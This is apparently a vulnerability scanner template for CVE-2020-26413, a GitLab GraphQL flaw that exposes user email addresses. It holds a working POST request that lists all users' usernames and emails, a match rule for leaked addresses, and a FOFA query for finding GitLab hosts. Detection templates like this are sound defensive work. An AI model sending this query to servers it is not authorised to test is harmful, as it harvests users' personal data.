CVE-2020-26413: GitLab Information Disclosure

id: CVE-2020-26413

info:
  name: GitLab Information Disclosure
  author: Print1n
  severity: medium
  description: |-
    An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible.
    fofa app="GitLab"
  reference:
    - https://www.tenable.com/security/research/tra-2020-48
    - https://nvd.nist.gov/vuln/detail/CVE-2020-26413
  tags: cve,cve2020,gitlab,disclosure
  created: 2023/06/23

rules:
  r0:
    request:
      method: POST
      path: /api/graphql
      headers:
        Content-Type: application/json
      body: '{"query":"{\nusers {\nedges {\n  node {\n    username\n    email\n    avatarUrl\n    status {\n      emoji\n      message\n      messageHtml\n     }\n    }\n   }\n  }\n }","variables":null,"operationName":null}'
    expression: response.status == 200 && "x-runtime" in response.headers && response.body.bcontains(b"{\"data\":{\"users\":{\"edges\":[{\"node\":{\"username\":\"") && "\",\"email\":\"[^\"]+@[^\"]+\"".bmatches(response.body)
expression: r0()